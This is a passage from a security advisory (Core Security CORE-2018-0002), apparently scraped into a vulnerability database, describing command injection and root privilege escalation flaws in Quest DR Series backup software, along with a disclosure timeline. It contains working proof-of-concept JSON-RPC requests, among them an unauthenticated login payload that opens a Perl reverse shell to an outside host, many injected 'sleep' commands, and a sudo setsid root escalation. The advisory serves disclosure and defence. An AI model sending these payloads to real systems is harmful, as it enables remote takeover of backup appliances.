\ngroups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) \n-----/ \n \n \n7.52. *Privilege escalation from web server user to root via setsid* \n \n[CVE-2018-11194] \nAnother command that can be run via sudo once code execution as the webadmin \nuser is achieved is the /usr/bin/setsid binary. This binary is used to run a \nprogram in a new session, resulting in local privilege escalation to root. \n \n/----- \nwebadmin@dr2k-1thv-dsmoke-01 > sudo /usr/bin/setsid id > /tmp/pepito \nwebadmin@dr2k-1thv-dsmoke-01 > cat /tmp/pepito \nuid=0(root) gid=0(root) \ngroups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) \n-----/ \n \n8. *Report Timeline* \n2018-01-31: Core Security sent an initial notification to Quest Software \nInc. \n(Quest), asking for GPG keys in order to send draft advisory. \n2018-01-31: Quest Support answered asking for the advisory in clear text. \n2018-01-31: Core Security sent the draft advisory in clear text form. \n2018-01-31: Quest Support replied that they received the draft advisory \nand that they would review it. \n2018-02-07: Core Security requested an update from Quest regarding the \nreported vulnerabilities and a tentative schedule. \n2018-02-07: Quest Support answered that it opened a bug id to track the \nfixes and asked Core Security for a tentative publication date. \n2018-02-07: Core Security answered saying that its intention is to \ncoordinate \nthe release in conjunction adjusting the schedule to the Quest's \ndevelopment \ntimeline. \n2018-02-08: Quest Support replied that engineering is testing the fixes and \nthey should have an estimate timeline the week of 12 February. \n2018-02-15: Core Security requested a status update. \n2018-02-22: Core Security again requested a status update and an estimated \ntimescale. \n2018-02-22: Quest Support answered that it is trying to get an update from \nthe engineering team. \n2018-03-01: Core Security requested a status update and a solidified \ntimeline. \n2018-03-01: Quest Support replied saying that engineering is planning to \nhave a patch ready by the end of March. \n2018-03-01: Core Security thanked the follow up and replied saying that \nit will contact Quest in two weeks. \n2018-03-15: Core Security requested a status update. \n2018-03-26: Core Security requested a status update again. \n2018-03-26: Quest Support answered saying it will get an update from the \nengineering team. \n2018-04-10: Quest Support informed that the latest build 4.0.3.1 addresses \nthe vulnerabilities that were reported. \n2018-04-10: Core Security asked if all the vulnerabilities reported are \naddressed by this build. \n2018-05-31: Advisory CORE-2018-0002 published. \n \n9. *References* \n \n[1] https://www.quest.com/products/dr-series-disk-backup-appliances/ \n \n10. *About CoreLabs* \n \nCoreLabs, the research center of Core Security, is charged with anticipating \nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security \nincluding system vulnerabilities, cyber attack planning and simulation, \nsource code auditing, and cryptography. Our results include problem \nformalization, identification of vulnerabilities, novel solutions and \nprototypes for new technologies. CoreLabs regularly publishes security \nadvisories, technical papers, project information and shared software \ntools for public use at: \nhttp://corelabs.coresecurity.com. \n \n11. *About Core Security* \n \nCore Security provides companies with the security insight they need to \nknow who, how, and what is vulnerable in their organization. The company's \nthreat-aware, identity & access, network security, and vulnerability \nmanagement solutions provide actionable insight and context needed to \nmanage security risks across the enterprise. This shared insight gives \ncustomers a comprehensive view of their security posture to make better \nsecurity remediation decisions. Better insight allows organizations to \nprioritize their efforts to protect critical assets, take action sooner \nto mitigate access risk, and react faster if a breach does occur. \n \nCore Security is headquartered in the USA with offices and operations in \nSouth America, Europe, Middle East and Asia. To learn more, contact Core \nSecurity at (678) 304-4500 or info@coresecurity.com \n \n12. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2018 Core Security and \n(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution \nNon-Commercial Share-Alike 3.0 (United States) License: \nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n13. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security advisories \nteam, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148003/CORE-2018-0002.txt"}], "coresecurity": [{"lastseen": "2018-05-31T20:39:01", "references": [], "description": "## 1\\. Advisory Information\n\n**Title: **Quest DR Series Disk Backup Multiple Vulnerabilities \n**Advisory ID: **CORE-2018-0002 \n**Advisory URL: **<http://www.coresecurity.com/advisories/quest-dr-series-disk-backup-multiple-vulnerabilities> \n**Date published: **2018-05-31 \n**Date of last update: **2018-05-22 \n**Vendors contacted: **Quest Software Inc. \n**Release mode: **Forced release\n\n## 2\\. Vulnerability Information\n\n**Class: **Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Execution with Unnecessary Privileges [[CWE-250](<http://cwe.mitre.org/data/definitions/250.html>)], Execution with Unnecessary Privileges [[CWE-250](<http://cwe.mitre.org/data/definitions/250.html>)], Execution with Unnecessary Privileges [[CWE-250](<http://cwe.mitre.org/data/definitions/250.html>)], Execution with Unnecessary Privileges [[CWE-250](<http://cwe.mitre.org/data/definitions/250.html>)], Execution with Unnecessary Privileges [[CWE-250](<http://cwe.mitre.org/data/definitions/250.html>)], Execution with Unnecessary Privileges [[CWE-250](<http://cwe.mitre.org/data/definitions/250.html>)] \n**Impact: **Code execution \n**Remotely Exploitable: **Yes \n**Locally Exploitable: **Yes \n**CVE Name: **[CVE-2018-11143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11143>), [CVE-2018-11144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11144>), [CVE-2018-11145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11145>), [CVE-2018-11146](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11146>), [CVE-2018-11147](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11147>), [CVE-2018-11148](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11148>), [CVE-2018-11149](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11149>), [CVE-2018-11150](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11150>), [CVE-2018-11151](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11151>), [CVE-2018-11152](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11152>), [CVE-2018-11153](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11153>), [CVE-2018-11154](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11154>), [CVE-2018-11155](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11155>), [CVE-2018-11156](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11156>), [CVE-2018-11157](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11157>), [CVE-2018-11158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11158>), [CVE-2018-11159](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11159>), [CVE-2018-11160](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11160>), [CVE-2018-11161](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11161>), [CVE-2018-11162](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11162>), [CVE-2018-11163](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11163>), [CVE-2018-11164](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11164>), [CVE-2018-11165](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11165>), [CVE-2018-11166](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11166>), [CVE-2018-11167](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11167>), [CVE-2018-11168](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11168>), [CVE-2018-11169](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11169>), [CVE-2018-11170](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11170>), [CVE-2018-11171](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11171>), [CVE-2018-11172](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11172>), [CVE-2018-11173](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11173>), [CVE-2018-11174](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11174>), [CVE-2018-11175](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11175>), [CVE-2018-11176](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11176>), [CVE-2018-11177](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11177>), [CVE-2018-11178](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11178>), [CVE-2018-11179](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11179>), [CVE-2018-11180](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11180>), [CVE-2018-11181](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11181>), [CVE-2018-11182](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11182>), [CVE-2018-11183](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11183>), [CVE-2018-11184](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11184>), [CVE-2018-11185](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11185>), [CVE-2018-11186](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11186>), [CVE-2018-11187](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11187>), [CVE-2018-11188](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11188>), [CVE-2018-11189](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11189>), [CVE-2018-11190](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11190>), [CVE-2018-11191](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11191>), [CVE-2018-11192](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11192>), [CVE-2018-11193](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11193>), [CVE-2018-11194](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11194>)\n\n## 3\\. Vulnerability Description\n\nQuest's website states that:\n\n\"The Quest DR Series of disk backup appliances [1] are engineered to handle hundreds of incoming backup streams with an all-inclusive software solution that simplifies management of backups, giving you more time to focus on other tasks.\n\nThe appliances work in conjunction with backup software applications to ensure data written to disks is protected for reliable recovery. New features such as storage groups, secure erase and user management give you the flexibility to tailor utilization policies to fit your organization's specific requirements.\n\nWith Quest DR Series appliances, you can:\n\n\\- Back up more of your servers and applications - with support for more than 15 backup applications and enhanced security features such as encryption at rest and secure erase.\n\n\\- Store less backup data - using variable block, in-line deduplication and compression to lower backup storage requirements by an average of 20:1 at an average cost of $.05 - $.17/GB.\n\n\\- Perform better during data ingest and management - with built-in accelerators, logical storage groups and support for Fibre Channel connectivity and virtual tape libraries (VTLs).\"\n\nMultiple vulnerabilities were found in the Quest DR Series Disk Backup software that would allow remote attackers to execute arbitrary system commands on the appliance with root permissions.\n\nNote: This advisory has limited details on the vulnerabilities because during an attempted coordinated disclosure process for other advisory, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of \"responsible disclosure\" can be found at <https://support.quest.com/essentials/reporting-security-vulnerability>.\n\nCoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.\n\nWe regret Quest's posture on disclosure and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.\n\n## 4\\. Vulnerable Packages\n\n * Quest DR Series Disk Backup Software 4.0.3\n\nOther products and versions might be affected, but they were not tested.\n\n## 5\\. Vendor Information, Solutions and Workarounds\n\nQuest has released the build 4.0.3.1 that address the reported vulnerabilities. Build can be download at:\n\n * For DR4300e, DR4300, and DR6300: <https://support.quest.com/download-install-detail/6085865>\n * For DR4000, DR4100, DR6000: <https://support.quest.com/download-install-detail/6085802>\n\nFor more details, Quest published the following Release Note: [https://support.quest.com/technical-documents/dr-series-software/4.0.3.1...](<https://support.quest.com/technical-documents/dr-series-software/4.0.3.1/release-notes/>)\n\n## 6\\. Credits\n\nThese vulnerabilities were discovered and researched by Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.\n\n## 7\\. Technical Description / Proof of Concept Code\n\nMultiple command injection vulnerabilities were found in the DR appliance software, which provides a web interface to manage system configuration. Clients make use of the site features via its exposed JSON-RPC API.\n\nThe product does only provide SSH access to administrators inside a restricted rbash environment. Administrators are able to execute a small number of utilities that are mostly replicated in the web console.\n\nWe present the most critical issue in section 7.1, which would allow a remote unauthenticated attacker to execute arbitrary system commands.\n\nSections 7.2 to 7.46 describe other command injection vectors that require the attacker to have a valid authentication token.\n\nFinally, six privilege escalation vulnerabilities are described from section 7.47 to 7.52 that would allow an attacker executing commands as the web server user to gain root privileges. Exploiting any of the command injection vulnerabilities would grant the attacker the initial foothold from where to escalate to root.\n\n### 7.1. Unauthenticated command injection on login\n\n[[CVE-2018-11143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11143>)] The 'Logon' method is in charge of processing login requests. It is possible for an unauthenticated attacker to execute arbitrary commands via the 'Password' parameter.\n\nThe following proof of concept opens a reverse shell connection to 192.168.1.36 on port 12345 using Perl. The username must point to an existing account on the system, so we set it to the hardcoded administrator account that ships with the product.\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Content-Type: text/plain\n Content-Length: 336\n Connection: close\n \n {\n \t\"jsonrpc\": \"2.0\",\n \t\"method\": \"Logon\",\n \t\"params\": {\n \t\t\"UserName\": \"administrator\",\n \t\t\"Password\": \"';perl -e 'use Socket;$i=\\\"192.168.1.36\\\";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");};';echo '\"\n \t},\n \t\"id\": 1\n }\n \n\nIf Active Directory support is configured, then the attacker would also be able to inject arbitrary commands into the username field.\n\n### 7.2. Command injection in the user update method\n\n[[CVE-2018-11144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11144>)] An authenticated attacker can craft the values of various user update properties to execute arbitrary commands on the system.\n\nThe following proof of concept injects a 'sleep' command in the 'oldName' parameter.\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5\n Content-Length: 158\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"update\",\n \"params\": {\n \"classname\": \"DRUsers\",\n \"user\": {\n \"oldName\": \";sleep 10; echo\",\n \"Name\": \"pepito\",\n \"oldRoles\": [\"PepitoRole\"]\n }\n },\n \"id\": 1\n }\n \n\n### 7.3. Command injection in the user delete method\n\n[[CVE-2018-11145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11145>)] An attacker would be able to inject system commands in the 'user' parameter passed to the 'delete' method.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5\n Content-Length: 102\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"delete\",\n \"params\": {\n \"classname\": \"DRUsers\",\n \"user\": \";sleep 10; echo \"\n },\n \"id\": 1\n }\n \n\n### 7.4. Command injection in the set user password method\n\n[[CVE-2018-11146](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11146>)] Both the 'update_pw' and 'setAdminPassword' methods can be abused to execute arbitrary system commands.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5\n Content-Length: 138\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"update_pw\",\n \"params\": {\n \"classname\": \"DRUsers\",\n \"user\": {\n \"Roles\": [\"PepeRole\"],\n \"Name\": \";sleep 10; echo \"\n }\n },\n \"id\": 1\n }\n \n\n### 7.5. Command injection in the add_new_container method\n\n[[CVE-2018-11147](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11147>)] Data backed up to DR Series appliances are handled as virtual shares or containers.\n\nThe proof of concept injects a 'sleep' command in the 'c_name' parameter passed to the vulnerable 'add_new_container' method.\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5\n Content-Length: 142\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"add_new_container\",\n \"params\": {\n \"classname\": \"DRContainers\",\n \"connection_type\": 5,\n \"c_name\": \"; sleep 10; echo \"\n },\n \"id\": 1\n }\n \n\n### 7.6. Command injection in the update_container method\n\n[[CVE-2018-11148](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11148>)] The method in charge of updating containers is also vulnerable to command injection.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5\n Content-Length: 141\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"update_container\",\n \"params\": {\n \"classname\": \"DRContainers\",\n \"connection_type\": 5,\n \"c_name\": \"; sleep 10; echo \"\n },\n \"id\": 1\n }\n \n\n### 7.7. Command injection in the setCleaner method\n\n[[CVE-2018-11149](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11149>)] The DR series administrator guide recommends performing scheduled disk space reclamation operations as a method for recovering disk space from the system. The subroutine in charge of setting this schedule was found to be vulnerable to command injection.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 124\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"setCleaner\",\n \"params\": {\n \"classname\": \"DRSchedules\",\n \"schedules\": [{\n \"day\": \"; sleep 10; #\"\n }]\n },\n \"id\": 1\n }\n \n\n### 7.8. Command injection in the setReplication method\n\n[[CVE-2018-11150](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11150>)] The DR Series system uses an active form of replication that lets you configure a primary-backup scheme. The subroutine in charge of configuring the replication schedule was found to be vulnerable to command injection.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 117\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"setReplication\",\n \"params\": {\n \"classname\": \"DRSchedules\",\n \"container\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.9. Command injection in the setResetOptions method\n\n[[CVE-2018-11151](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11151>)] The DR series system GUI allows an administrator to configure password reset options, which is basically enabling or disabling the 'Forgot your password' link on the logon page. The subroutine that implements this functionality was found to be vulnerable to command injection via the 'admin_email' and 'relay_host' request parameters.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 119\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"setResetOptions\",\n \"params\": {\n \"classname\": \"DRPassword\",\n \"admin_email\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.10. Command injection in the set_compression method\n\n[[CVE-2018-11152](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11152>)] The appliance allows configuring several compression levels for each storage group. The subroutine that sets the level of compression was found to be vulnerable to command injection.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 127\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"set_compression\",\n \"params\": {\n \"classname\": \"DRCompression\",\n \"compressionLevel\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.11. Command injection in the license delete method\n\n[[CVE-2018-11153](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11153>)] The JSON-RPC API exposes several methods to operate with system licenses, several of which are vulnerable to command injection issues. The 'delete' subroutine can be exploited by crafting the value of the 'serviceTag' request parameter.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 108\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"delete\",\n \"params\": {\n \"classname\": \"DRLicense\",\n \"serviceTag\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.12. Command injection in the registerDR2000v method\n\n[[CVE-2018-11154](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11154>)] The 'registerDR2000v' method is part of the licensing system. This subroutine is vulnerable to command injection via the 'LicenseServer', 'AdminName', 'Email', 'CompanyName' and 'Comments' request parameters.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n 